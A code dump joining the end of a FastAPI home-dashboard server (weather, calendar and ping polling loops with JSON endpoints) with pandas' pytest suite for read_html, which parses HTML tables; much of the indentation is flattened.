units=conf['units']
)
with open(os.path.join(*conf['persistenceFolder'].split('/'), 'oneCall.json'), 'w') as f:
json.dump(data, f, indent=4)
with open(os.path.join(*conf['persistenceFolder'].split('/'), 'weatherMap.png'), 'wb') as f:
f.write(img)
# Get events
events = []
for cal in calendars:
events.extend(cal.getEvents(count=conf['eventCount']))
events = sorted(events, key=lambda event: datetime.datetime.fromisoformat(event['start']).timestamp())
with open(os.path.join(*conf['persistenceFolder'].split('/'), 'calendarEvents.json'), 'w') as f:
json.dump(events, f, indent=4)
time.sleep(conf['fetchLoopDelay'])
def pingLoop(conf):
while True:
serverdata = conf['servers'][:]
for i in serverdata:
try:
pingdata = icmplib.ping(i['address'], privileged=False)
i['alive'] = pingdata.is_alive
                i['ping'] = str(pingdata.avg_rtt) + 'ms'  # icmplib RTTs are in milliseconds
except icmplib.NameLookupError:
i['alive'] = False
i['ping'] = 'N/A'
with open(os.path.join(*conf['persistenceFolder'].split('/'), 'pingData.json'), 'w') as f:
json.dump(serverdata, f, indent=4)
time.sleep(conf['pingLoopDelay'])
# Load configuration file @ config.json
with open('config.json', 'r') as f:
CONFIG = json.load(f)
STARTTIME = time.time()
app = FastAPI()
@app.get('/debug')
async def get_debug():
return {'target': CONFIG['target'], 'calendars': CONFIG['calendars'], 'units': CONFIG['units']}
@app.get('/data/weatherMap')
async def get_weather_map():
return FileResponse(os.path.join(*CONFIG['persistenceFolder'].split('/'), 'weatherMap.png'), headers={
'Cache-Control': 'no-cache'
})
@app.get('/data/weather')
async def get_weather_data():
with open(os.path.join(*CONFIG['persistenceFolder'].split('/'), 'oneCall.json'), 'r') as f:
return json.load(f)
@app.get('/data/events')
async def get_events():
with open(os.path.join(*CONFIG['persistenceFolder'].split('/'), 'calendarEvents.json'), 'r') as f:
return json.load(f)
@app.get('/data/pings')
async def get_pings():
with open(os.path.join(*CONFIG['persistenceFolder'].split('/'), 'pingData.json'), 'r') as f:
return json.load(f)
app.mount('/s', StaticFiles(directory='web'), name='static')
@app.get('/')
async def get_root():
return FileResponse(os.path.join('web', 'index.html'), media_type='text/html')
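# A hedged sketch of the config.json shape this server reads, inferred from
# the keys used above; every value below is a placeholder, not a real key,
# calendar, or address.
EXAMPLE_CONFIG = {
    'host': '127.0.0.1', 'port': 8000,
    'owmKey': '<openweathermap-key>', 'mbKey': '<mapbox-key>',
    'calKey': 'keys/calendar.json', 'persistenceFolder': 'persist',
    'fetchLoopDelay': 300, 'pingLoopDelay': 60, 'eventCount': 10,
    'units': 'metric', 'timezone': 'UTC', 'emailMap': {},
    'target': {'latitude': 0.0, 'longitude': 0.0, 'zoom': 6,
               'tileSpan': 1, 'layers': ['precipitation_new']},
    'calendars': [{'id': '<calendar-id>', 'name': 'Home', 'color': '#00aaff'}],
    'servers': [{'address': '192.0.2.1'}],
}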
# Start loop process and run server if this execution is the main execution
if __name__ == '__main__':
# Make persistent file directory
if not os.path.exists(os.path.join(*CONFIG['persistenceFolder'].split('/'))):
os.mkdir(os.path.join(*CONFIG['persistenceFolder'].split('/')))
# Start fetch loop
RUNNING_PROCESS = Process(target=apiFetchLoop, name='FetchLoop', args=[CONFIG], daemon=True)
RUNNING_PROCESS.start()
RUNNING_PROCESS2 = Process(target=pingLoop, name='PingLoop', args=[CONFIG], daemon=True)
RUNNING_PROCESS2.start()
# Start REST API
uvicorn.run('server:app', host=CONFIG['host'], port=CONFIG['port'], access_log=False)
|
test_html.py
|
from __future__ import print_function
from functools import partial
import os
import re
import threading
import numpy as np
from numpy.random import rand
import pytest
from pandas.compat import (
BytesIO, StringIO, is_platform_windows, map, reload, zip)
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import (
DataFrame, Index, MultiIndex, Series, Timestamp, date_range, read_csv)
import pandas.util.testing as tm
from pandas.util.testing import makeCustomDataframe as mkdf, network
from pandas.io.common import URLError, file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(params=[
'chinese_utf-16.html',
'chinese_utf-32.html',
'chinese_utf-8.html',
'letz_latin1.html',
])
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath('io', 'data', 'html_encoding', request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), ('lists are not of equal size '
'len(list1) == {0}, '
'len(list2) == {1}'.format(len(list1),
len(list2)))
msg = 'not all list elements are DataFrames'
both_frames = all(map(lambda x, y: isinstance(x, DataFrame) and
isinstance(y, DataFrame), list1, list2))
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, 'frames are both empty'
@td.skip_if_no('bs4')
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, '__version__', '4.2')
with pytest.raises(ValueError, match="minimum version"):
read_html(datapath("io", "data", "spam.html"), flavor='bs4')
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, "google", flavor=flavor)
@td.skip_if_no('bs4')
@td.skip_if_no('lxml')
def test_same_ordering(datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs_lxml = read_html(filename, index_col=0, flavor=['lxml'])
dfs_bs4 = read_html(filename, index_col=0, flavor=['bs4'])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize("flavor", [
    pytest.param('bs4', marks=pytest.mark.skipif(
        not td.safe_import('bs4'), reason='No bs4')),
pytest.param('lxml', marks=pytest.mark.skipif(
not td.safe_import('lxml'), reason='No lxml'))], scope="class")
class TestReadHtml(object):
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath('io', 'data', 'spam.html')
self.spam_data_kwargs = {}
self.spam_data_kwargs['encoding'] = 'UTF-8'
self.banklist_data = datapath("io", "data", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = mkdf(4, 3, data_gen_f=lambda *args: rand(), c_idx_names=False,
r_idx_names=False).applymap('{0:.3f}'.format).astype(float)
out = df.to_html()
res = self.read_html(out, attrs={'class': 'dataframe'}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@network
def test_banklist_url(self):
url = 'http://www.fdic.gov/bank/individual/failed/banklist.html'
df1 = self.read_html(url, 'First Federal Bank of Florida',
attrs={"id": 'table'})
df2 = self.read_html(url, 'Metcalf Bank', attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
@network
def test_spam_url(self):
url = ('http://ndb.nal.usda.gov/ndb/foods/show/300772?fg=&man=&'
'lfacet=&format=&count=&max=25&offset=&sort=&qlookup=spam')
df1 = self.read_html(url, '.*Water.*')
df2 = self.read_html(url, 'Unit')
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(self.banklist_data, '.*Florida.*',
attrs={'id': 'table'})
df2 = self.read_html(self.banklist_data, 'Metcalf Bank',
attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, '.*Water.*')
df2 = self.read_html(self.spam_data, 'Unit')
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == 'Proximates'
assert df1[0].columns[0] == 'Nutrient'
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={'id': 'table'})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, '.*Water.*', header=2)[0]
assert df.columns[0] == 'Proximates'
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_xrange(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=range(2))[0]
df2 = self.read_html(self.spam_data, 'Unit', skiprows=range(2))[0]
tm.assert_frame_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=[1, 2])
df2 = self.read_html(self.spam_data, 'Unit', skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows={1, 2})
df2 = self.read_html(self.spam_data, 'Unit', skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, '.*Water.*',
skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=('is not a valid type '
'for skipping rows')):
self.read_html(self.spam_data, '.*Water.*', skiprows='asdf')
def test_index(self):
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, '.*Water.*')
df2 = self.read_html(data2, 'Unit')
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, '.*Water.*')
df2 = self.read_html(data, 'Unit')
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, '.*Water.*')
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, 'Unit')
assert_framelist_equal(df1, df2)
@network
def test_bad_url_protocol(self):
with pytest.raises(URLError):
self.read_html('git://github.com', match='.*Water.*')
@network
def test_invalid_url(self):
try:
with pytest.raises(URLError):
self.read_html('http://www.a23950sdfa908sd.com',
match='.*Water.*')
except ValueError as e:
assert 'No tables found' in str(e)
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
'First',
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match='No tables found'):
self.read_html(url, 'First Federal Bank of Florida',
attrs={'id': 'tasdfable'})
def _bank_data(self, *args, **kwargs):
return self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'}, *args, **kwargs)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
df = self._bank_data(header=[0, 1], skiprows=1,
tupleize_cols=True)[0]
assert isinstance(df.columns, Index)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile('Florida')),
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r'\(you passed a negative value\)'
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, 'Water', skiprows=-1)
@network
def test_multiple_matches(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
assert len(dfs) > 1
@network
def test_python_docs_table(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(['Repo', 'What'])
@pytest.mark.slow
def test_thousands_macau_stats(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath("io", "data", "macau.html")
dfs = self.read_html(macau_data, index_col=0,
attrs={'class': 'style1'})
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
@pytest.mark.slow
def test_thousands_macau_index_col(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath('io', 'data', 'macau.html')
dfs = self.read_html(macau_data, index_col=0, header=0)
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
result = self.read_html('''
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
''')
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html('''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data={'Header': 'first'}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[['Ukraine', 'Odessa', 1944]],
columns=['Country', 'Municipality', 'Year'])
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot rows containing td or th cells,
and ignores an empty tfoot.
"""
data_template = '''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>'''
expected1 = DataFrame(data=[['bodyA', 'bodyB']], columns=['A', 'B'])
expected2 = DataFrame(data=[['bodyA', 'bodyB'], ['footA', 'footB']],
columns=['A', 'B'])
data1 = data_template.format(footer="")
data2 = data_template.format(
footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html('''
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
''', header=0)[0]
expected = DataFrame([['text', 1944]], columns=('S', 'I'))
tm.assert_frame_equal(result, expected)
def test_nyse_wsj_commas_table(self, datapath):
data = datapath('io', 'data', 'nyse_wsj.html')
df = self.read_html(data, index_col=0, header=0,
attrs={'class': 'mdcTable'})[0]
expected = Index(['Issue(Roll over for charts and headlines)',
'Volume', 'Price', 'Chg', '% Chg'])
nrows = 100
assert df.shape[0] == nrows
tm.assert_index_equal(df.columns, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'})[0]
ground_truth = read_csv(datapath('io', 'data', 'banklist.csv'),
converters={'Updated Date': Timestamp,
'Closing Date': Timestamp})
assert df.shape == ground_truth.shape
old = ['First Vietnamese American BankIn Vietnamese',
'Westernbank Puerto RicoEn Espanol',
'R-G Premier Bank of Puerto RicoEn Espanol',
'EurobankEn Espanol', 'Sanderson State BankEn Espanol',
'Washington Mutual Bank(Including its subsidiary Washington '
'Mutual Bank FSB)',
'Silver State BankEn Espanol',
'AmTrade International BankEn Espanol',
'Hamilton Bank, NAEn Espanol',
'The Citizens Savings BankPioneer Community Bank, Inc.']
new = ['First Vietnamese American Bank', 'Westernbank Puerto Rico',
'R-G Premier Bank of Puerto Rico', 'Eurobank',
'Sanderson State Bank', 'Washington Mutual Bank',
'Silver State Bank', 'AmTrade International Bank',
'Hamilton Bank, NA', 'The Citizens Savings Bank']
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ['Closing Date', 'Updated Date']
converted[date_cols] = converted[date_cols]._convert(datetime=True,
coerce=True)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = 'Gold Canyon'
with open(self.banklist_data, 'r') as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(self.banklist_data, 'Gold Canyon',
attrs={'id': 'table'})[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
result = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
""")[0]
expected = DataFrame([['a', 'b', 'c']], columns=['A', 'B', 'C'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html("""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'Z', 'C']],
columns=['X', 'X.1', 'Y', 'Z', 'W'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html("""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'B', 'D']],
columns=['A', 'B', 'B.1', 'B.2', 'C'])
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html("""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['C', 'B']], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B'], ['A', 'B']],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({'date': date_range('1/1/2001', periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=['date'], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range('1/1/2001', periods=10))
df = DataFrame({'date': raw_dates.map(lambda x: str(x.date())),
'time': raw_dates.map(lambda x: str(x.time()))})
res = self.read_html(df.to_html(), parse_dates={'datetime': [1, 2]},
index_col=1)
newdf = DataFrame({'datetime': raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_computer_sales_page(self, datapath):
data = datapath('io', 'data', 'computer_sales_page.html')
msg = (r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns")
with pytest.raises(ParserError, match=msg):
self.read_html(data, header=[0, 1])
data = datapath('io', 'data', 'computer_sales_page.html')
assert self.read_html(data, header=[1, 2])
def test_wikipedia_states_table(self, datapath):
data = datapath('io', 'data', 'wikipedia_states.html')
assert os.path.isfile(data), '%r is not a file' % data
assert os.path.getsize(data), '%r is an empty file' % data
result = self.read_html(data, 'Arizona', header=1)[0]
assert result['sq mi'].dtype == np.dtype('float64')
def test_parser_error_on_empty_header_row(self):
msg = (r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns")
with pytest.raises(ParserError, match=msg):
self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""", header=[0, 1])
def test_decimal_rows(self):
# GH 12907
result = self.read_html('''<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>''', decimal='#')[0]
expected = DataFrame(data={'Header': 1100.101}, index=[0])
assert result['Header'].dtype == np.dtype('float64')
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
for arg in [True, False]:
with pytest.raises(TypeError):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={'a': str}
)[0]
expected = DataFrame({'a': ['0.763', '0.244']})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244])[0]
expected = DataFrame({'a': [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({'a': ['N/A', 'NA']})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({'a': [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
""")[0]
expected = DataFrame(data=[['a', 'b'], [np.nan, np.nan]],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(data=[("Hillary", 68, "D"),
("Bernie", 74, "D"),
("Donald", 69, "R")])
expected_df.columns = [["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1",
"Unnamed: 2_level_1"]]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath('io', 'data', 'banklist.html')
self.read_html(banklist_data, '.*Water.*', flavor=['lxml', 'html5lib'])
def test_to_html_timestamp(self):
rng = date_range('2000-01-01', periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert '2000-01-01' in result
@pytest.mark.parametrize("displayed_only,exp0,exp1", [
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"]))])
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO("""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>""")
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
_, encoding = os.path.splitext(
os.path.basename(html_encoding_file)
)[0].split('_')
try:
with open(html_encoding_file, 'rb') as fobj:
from_string = self.read_html(fobj.read(), encoding=encoding,
index_col=0).pop()
with open(html_encoding_file, 'rb') as fobj:
from_file_like = self.read_html(BytesIO(fobj.read()),
encoding=encoding,
index_col=0).pop()
from_filename = self.read_html(html_encoding_file,
encoding=encoding,
index_col=0).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if '16' in encoding or '32' in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get('flavor') == 'lxml':
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO('''
<table><tr><td>spam<foobr />eggs</td></tr></table>''')
assert self.read_html(bad)
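# The first parse consumed the unseekable stream; read_html cannot rewind it
# for a retry, so a second call must fail.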
with pytest.raises(ValueError,
match='passed a non-rewindable file object'):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile(object):
def __init__(self, data):
self.data = data
self.at_end = False
